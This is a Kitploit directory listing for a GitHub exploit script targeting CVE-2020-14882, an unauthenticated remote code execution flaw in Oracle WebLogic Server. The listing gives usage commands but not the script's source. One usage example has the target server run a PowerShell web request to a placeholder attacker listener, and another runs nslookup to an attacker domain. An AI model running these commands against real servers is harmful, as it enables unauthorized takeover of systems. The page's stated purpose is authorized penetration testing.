Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-14882 — This script allows for remote code execution (RCE) on Oracle WebLogic Server | Kitploit
Tools/GitHubGitHub/danny-lli/cve-2020-14882
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

This script allows for remote code execution (RCE) on Oracle WebLogic Server

View Repository
2123 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-14882

This script enables remote code execution (RCE) on Oracle WebLogic Server using an unauthenticated GET request. It exploits the vulnerability CVE-2020-14882. By executing arbitrary commands, an attacker can gain unauthorized access to the server.

Exploit Details

  • Exploit Title: Oracle WebLogic Server, Unauthenticated RCE via GET request
  • Exploit Author: Danny Safaya
  • CVE: CVE-2020-14882
  • Vendor Homepage: Oracle WebLogic Server
  • Software Link: Oracle Middleware Downloads
  • More Info: WebLogic RCE by only one GET request (CVE-2020-14882) analysis

Usage

Make sure you have Python 3 installed. To use this script, follow the steps below:

  1. Open a terminal or command prompt.

  2. Run the script using the following command:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Replace http(s)://target:7001 with the target URL of the Oracle WebLogic Server, and command with the desired command to execute.

Example 1:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"

This example executes the command nslookup your_Domain on the target server.

Example 2:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"

This example executes the PowerShell command Invoke-WebRequest -Uri http://your_listener on the target server.

Warning

This script is intended for authorized penetration testing and security research purposes only. Unauthorized use of this script to exploit systems without proper consent is illegal and may result in legal consequences. Use it at your own risk.

Dependencies

This script requires the following dependencies:

  • requests
  • urllib3

Please ensure that these dependencies are installed before running the script.


Download Tool